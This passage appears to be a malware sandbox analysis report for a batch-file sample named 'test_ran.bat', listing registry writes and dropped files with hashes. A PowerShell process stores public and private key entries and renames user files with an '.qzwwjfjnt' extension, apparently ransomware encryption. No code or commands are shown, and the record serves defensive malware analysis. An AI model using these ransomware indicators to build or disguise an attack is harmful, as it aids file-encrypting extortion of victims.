HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
name
120
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
size
80
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
psize
80
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
type
120
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
mtime
100
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
crc
70
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_0
38000000730100000402000000000000D4D0C800000000000000000000000000BC031B000000000039000000B40200000000000001000000
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_1
38000000730100000500000000000000D4D0C80000000000000000000000000006021A0000000000160000002A0000000000000002000000
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_2
38000000730100000400000000000000D4D0C80000000000000000000000000094050B000000000016000000640000000000000003000000
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
1216
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
1
C:\Users\admin\AppData\Local\Temp\test_ran.bat.zip.zip
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\AppData\Local\Temp\Rar$DIb3708.43025\test_ran.bat.zip
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
1216
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
@C:\Windows\System32\acppage.dll,-6002
Windows Batch File
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface
ShowPassword
0
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Placement
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General
LastFolder
C:\Users\admin\AppData\Local\Temp\Rar$DIb3708.43025
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
name
120
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
size
80
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
psize
80
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
type
120
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
mtime
100
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
crc
70
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_0
38000000730100000402000000000000D4D0C8000000000000000000000000003A0121000000000039000000B40200000000000001000000
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_1
38000000730100000500000000000000D4D0C800000000000000000000000000B803180000000000160000002A0000000000000002000000
1216
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_2
38000000730100000400000000000000D4D0C8000000000000000000000000008C0607000000000016000000640000000000000003000000
256
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
256
powershell.exe
write
HKEY_CURRENT_USER\Software\ex_data\data
ext
2E0071007A00770077006A0066006A006E0074000000
256
powershell.exe
write
HKEY_CURRENT_USER\Software\keys_data\data
public
256
powershell.exe
write
HKEY_CURRENT_USER\Software\keys_data\data
private
256
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
256
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
256
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
256
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
failed_count
0
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
state
2
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
state
1
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
dr
1
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome
UsageStatsInSample
0
2792
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}
usagestats
0
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid_installdate
0
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid_enableddate
0
2792
chrome.exe
delete key
HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
2792
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\_NumAccounts
aggregate
sum()
2792
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\_NumAccounts
S-1-5-21-1302019708-1500728564-335382590-1000
1
2792
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\_NumSignedIn
aggregate
sum()
2792
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\_NumSignedIn
S-1-5-21-1302019708-1500728564-335382590-1000
0
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
user_experience_metrics.stability.exited_cleanly
0
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
lastrun
13186143152877250
2792
chrome.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3568
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
2792-13186143152205375
259
2020
chrome.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US

Files activity

Executable files
0
Suspicious files
343
Text files
291
Unknown types
4

Dropped files

PID
Process
Filename
Type
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RF602111.TMP
text
MD5: 199d6696217cfca03023608d1ab6d072
SHA256: 4a8f48c9876317472abbbbe3c740f9971d5ca785774f83f3aaff78af3646c936
256
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml.qzwwjfjnt
binary
MD5: c59407d0feddd511d506dbdd83eab509
SHA256: aa48dae519b8b74beb509166762f797cc97ca5a3d43f236b490d372d3527dce7
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\2998bdc0-8ac7-472b-9216-1e3c7824ef3b.tmp
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity~RF601b07.TMP
text
MD5: c0510b40cab772cda6fb5e651b455c18
SHA256: 6dfa681913e55ee92c0fec2efc412acaa5872570ecbfd10139f2331b2604dafa
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity
text
MD5: c0510b40cab772cda6fb5e651b455c18
SHA256: 6dfa681913e55ee92c0fec2efc412acaa5872570ecbfd10139f2331b2604dafa
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\3aa4b967-1bb6-487f-b6dc-10d32b2553d3.tmp
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State
text
MD5: c05d737e66c0e4bd506ca37bced47535
SHA256: 1ce6aa8f59d89a0ca9686e08192e382ebcbe1fc81d0185029f41225137bd9609
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State~RF601aa9.TMP
text
MD5: c05d737e66c0e4bd506ca37bced47535
SHA256: 1ce6aa8f59d89a0ca9686e08192e382ebcbe1fc81d0185029f41225137bd9609
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\7deaf6b4-cc5a-4e8b-a5de-d6b73f01b874.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: d53f9e864b01ab5cd52a657fd5af4914
SHA256: f224cc86c9280be890fcac0ddc90e031b0f5105735864d59733feb01d26d785b
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000023
image
MD5: 8498a813da225bfe690197df98ac960f
SHA256: 6e56f6a1174244761c0d41ddb976a2771a261ffc6d39b4fd51999bb4e9007dd3
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
binary
MD5: 8763c3c2769de5da7876faffe9173089
SHA256: 0f064d133808530a5664d877ffdf5efd5149cf8476d05d0a6a7cd09644d2fa11
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF600126.TMP
binary
MD5: 8763c3c2769de5da7876faffe9173089
SHA256: 0f064d133808530a5664d877ffdf5efd5149cf8476d05d0a6a7cd09644d2fa11
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 5e26ccbc1b07b9a27003abe0a925a513
SHA256: 7980f0fa2b204c7ccfc82585fc8986e06e4768667bc8d5e039cf227f6273873b
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000022
compressed
MD5: 35af0198c2b934e14d29a4fea590dea8
SHA256: 6b942e2169b2a8e7b13217dbebff4b5b5670ecf9c5d405bbe000aa5033ac5ddd
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000021
html
MD5: 5948b37af7cea16ca56215208b55917a
SHA256: 9a0dd3893be4353733966562440d466c5824817488f407764e7d77bee3911221
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001f
compressed
MD5: a8c76a27d1de3f2d1bc4dc2f77d25b0a
SHA256: 8c81fab92d778a009a83a9abde61182b82c946533f46916b7afde508ce29bccb
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000020
text
MD5: 39c56015ba6186ba344db15a51e6a57b
SHA256: 8febeb9b35d0161d9ea6fd2fc15a770b0fe4f24b2d57076bea6da25325be88ba
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001e
compressed
MD5: 3da2b4a8893eff0a09733888ffab43a1
SHA256: c120ee81362ed0e4730c1de3f98f9bb596430780fe23301f47621aa9c3afba9a
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001d
compressed
MD5: 914676df3e687523d23cf4f91868e3af
SHA256: 09a827ec2959ea2b4fe00cff593c0fa39e5a03eedf36f3b9fd9915dbb925e135
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
text
MD5: 5f910f89c0fcf13165185a62a2055595
SHA256: 643853828a43c0041afface49f7210bb516154f69634abcef46398d6f0495f4c
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RF5ff9f2.TMP
text
MD5: 5f910f89c0fcf13165185a62a2055595
SHA256: 643853828a43c0041afface49f7210bb516154f69634abcef46398d6f0495f4c
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\41604964-b175-43d5-8a26-be6ef22fe453.tmp
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001c
compressed
MD5: 01d5892e6e243b52998310c2925b9f3a
SHA256: 7e90efb4620a78e8869796d256bcddbde90b853c8c15c5cc116cb11d3d17bc4d
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001b
image
MD5: 345883366c0cef4c0016babdea20cd54
SHA256: b666ea2fb805733dcbb3fcd8343bc21c961bbfa56bd8880ad829ed58bbb2063c
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001a
image
MD5: 0e014aa010d4d456077a996fad204cf5
SHA256: 3e2784c45ca959cbfc1f1d8466f2fdb09eb3db18e1a506abb6d16998a7bcaf1e
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000019
image
MD5: 3eac4ef5e6481f5b32ea41a33e9d972d
SHA256: ab413587129dd4151018ac44aabf544473bf3cadbda9a2f4859c92a7df28a9a0
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000018
compressed
MD5: 36a35496107d5d04f2c859f9e3c3c4f9
SHA256: 6828977977a67215511d757a4ec21f23ab4449272b9abcc9a8b2776c7125479c
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000017
compressed
MD5: 252047cc64c4b1980fafe6abca669f06
SHA256: 1045d98023671ce42bbcb900f609fe49c335479963cdfab1f1824f1db18892dc
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000016
compressed
MD5: 79c26a3bec8c8195107cb0e69f211ea6
SHA256: 729259be1acde44ee426a5c1acde0512b16e534fdecfb022feebc7334c969029
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity~RF5ff186.TMP
text
MD5: 4a153fcc0276766ead4d122bbdd86fc3
SHA256: 29750bec6ad1841a4b68d7c5729c5ce0912146dbfa2f2572821535a06a9939a9
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity
text
MD5: 4a153fcc0276766ead4d122bbdd86fc3
SHA256: 29750bec6ad1841a4b68d7c5729c5ce0912146dbfa2f2572821535a06a9939a9
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\3b6e713b-e5e7-4191-b6dd-5e98c947ae50.tmp
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State
text
MD5: c9958704b693d9777afc467aacade0ce
SHA256: 95fedcb502d5026ab93cc35c26cfd5c1e8f37cd2139f602fe40ed63ee36e540e
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State~RF5fefff.TMP
text
MD5: c9958704b693d9777afc467aacade0ce
SHA256: 95fedcb502d5026ab93cc35c26cfd5c1e8f37cd2139f602fe40ed63ee36e540e
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\75b830b7-b7ad-45cd-b42a-971abd1c736d.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 2ba2d52e8337b90d3afd7403ce854ec3
SHA256: 3103b7c9db2fd6ea51b7ece83429b9c6bac0de96ad1d8cee115f2f927eb9ca69
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 844627a614746ebcbda52fd19e177cc0
SHA256: 8980013f453255cb020ffcfb5dfcbc68be0bf42e688601c8ae2358a0cac0c79a
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\0d9a7fce-f7ba-4f72-9b38-6cfc7ff1922f\index-dir\the-real-index
binary
MD5: aa091c8c2b4e473591a3b991af6213c9
SHA256: d7384e6f7c34a37fc621c5dadb6b062cd0cfe6bd58d7d304583ce1ec8cc03e07
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\0d9a7fce-f7ba-4f72-9b38-6cfc7ff1922f\index-dir\the-real-index~RF5fd2c3.TMP
binary
MD5: aa091c8c2b4e473591a3b991af6213c9
SHA256: d7384e6f7c34a37fc621c5dadb6b062cd0cfe6bd58d7d304583ce1ec8cc03e07
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\0d9a7fce-f7ba-4f72-9b38-6cfc7ff1922f\index-dir\temp-index
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: c10745438309dd8a003bf36fdb51c651
SHA256: 351011a3ef71e1bd3c925a9d0fec6351823549a458cf8419ad7a04c6e3db8373
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000015
compressed
MD5: c42128f2d249ab4f921112e47104a06a
SHA256: abf1578241c9a2cd39e4aacdaeaf09f18494549c33255ba0ae2f3c3045dde2c1
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000014
compressed
MD5: 95314693806514bda465c9862754373b
SHA256: 9e470adeea64a44c5892444e3c590e6c18fd2fff052778eaf86f1537813001c5
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000013
compressed
MD5: a1212780625817bc6893b78aca9cdc84
SHA256: 2ee825188e274099affc08e8f8de0fc094235cd7ad95a50abe9a74d3f6a68ca6
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000012
binary
MD5: aa96776b2bbf15a3c227d0bd2c8fdc2d
SHA256: 5eba4991e6d9e6e87b1c2fa81b38899087dd0575713e8274d4f2cc3ae7370b19
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000011
image
MD5: fee6bcb494ab0b0b26f6d27b1eb1e1bb
SHA256: db2dc0c2c1de04d7225f5f9eedc85f9da9778805ded39c98b90a1fe211a5ce61
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity
text
MD5: 7f89ed850dfac810b46dd85f67cd54ec
SHA256: 9faedbb59012fe5de199d8add0b9c69c38b8b338cb07dd9a6150cd8fc8795c76
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity~RF5fc9ca.TMP
text
MD5: 7f89ed850dfac810b46dd85f67cd54ec
SHA256: 9faedbb59012fe5de199d8add0b9c69c38b8b338cb07dd9a6150cd8fc8795c76
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\bdbf72a3-6910-43a2-84bb-1f4d15e06ae1.tmp
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RF5fc97c.TMP
text
MD5: af8f1e30e353ce56c4fcb0a8bdccd3a0
SHA256: b8f590d79c28ef909b409b25f515f1a739f04d4f0930bc21b7d7f79bc7ee5863
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
text
MD5: af8f1e30e353ce56c4fcb0a8bdccd3a0
SHA256: b8f590d79c28ef909b409b25f515f1a739f04d4f0930bc21b7d7f79bc7ee5863
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\9f4b1d02-2126-4f2a-8e35-e3cc8fbd43c7.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
binary
MD5: 5c4a4acb36087402d89200f77077c95f
SHA256: 3ffcd4463abb2d678162a64c2ce6f04a048bb424dee8d9c7078388af52fef41c
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG
text
MD5: 334cc53c75ff52f90395036eea62c274
SHA256: ee267d4bedd4ed0ff7c778df3a1b530fbe7476cd2a0655b7c4034b852374d19f
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log
binary
MD5: 021b8d293c14358bb37b18ba45792aa5
SHA256: 5b149d68659ebeab90f1116b8704a32dc240fbf85171bd4a4f70d57a3d8d4bb8
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old
text
MD5: 8ddcd8b46559486c5c65d91b1964f9b1
SHA256: 30953aa5d4726c71b4e633a258e82d3979243f4597973adfbe45f005d79bcc8b
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old~RF5fc91e.TMP
text
MD5: 8ddcd8b46559486c5c65d91b1964f9b1
SHA256: 30953aa5d4726c71b4e633a258e82d3979243f4597973adfbe45f005d79bcc8b
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG.old
text
MD5: b36272766fafe4f495f275ab24d055a4
SHA256: c6ed4b87e6b46abc8f08c947e4c78f8d4416b35ab63980b8314794cc43d0c365
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG.old~RF5fc8ff.TMP
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG.old
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State
text
MD5: e50795110f926bae4bf2aad2b0c5604b
SHA256: 842bbea0840ac1cd88cdf7b420efd7eb8404cb6d75f8144385ba6608fdff2751
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State~RF5fc8df.TMP
text
MD5: e50795110f926bae4bf2aad2b0c5604b
SHA256: 842bbea0840ac1cd88cdf7b420efd7eb8404cb6d75f8144385ba6608fdff2751
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\e77ec3ea-0bd0-44f8-9695-4faa2698bec4.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Local\Temp\CabC8C4.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Local\Temp\TarC8D5.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
compressed
MD5: 2af3e4b57a8b637fcee8cb7485986fa3
SHA256: 10632f5e8df34d4641f11aa0ad917a629bf75f7c0eaa77506c5a27919e7b12aa
256
powershell.exe
C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
binary
MD5: ead74ee13542857f824ff7059391bc78
SHA256: 13624ac4c1c9823381473bd75457e974936d6d1d767fb7f35a8ef9944f84a1e0
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\index.txt~RF5fc7b6.TMP
binary
MD5: 39e27b40fe3f4db34ab2d2f1cf07953f
SHA256: 197e8b3a0147e6580fa2bb76ef024aa5da8a0e1c73806e7aecccc430bdd36178
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\index.txt.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Local\Temp\TarC7B9.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Local\Temp\CabC7B8.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Local\Temp\TarC798.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Local\Temp\CabC797.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 1755365ceb4605b9bdcca8479e88fefe
SHA256: 609b52dbd5b42c011d125d1af4d23f0d42ee4317c42f81df634c28433a664b90
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\index-dir\the-real-index
binary
MD5: dfa6ed37cd84f695a965f6e6ca42b9ba
SHA256: 87e1a415074f84263aa202f69aef005d608892e82b76877c17ba100ea0bd6c30
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\index-dir\the-real-index~RF5fbe50.TMP
binary
MD5: dfa6ed37cd84f695a965f6e6ca42b9ba
SHA256: 87e1a415074f84263aa202f69aef005d608892e82b76877c17ba100ea0bd6c30
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\index-dir\temp-index
––
MD5:  ––
SHA256:  ––
2792
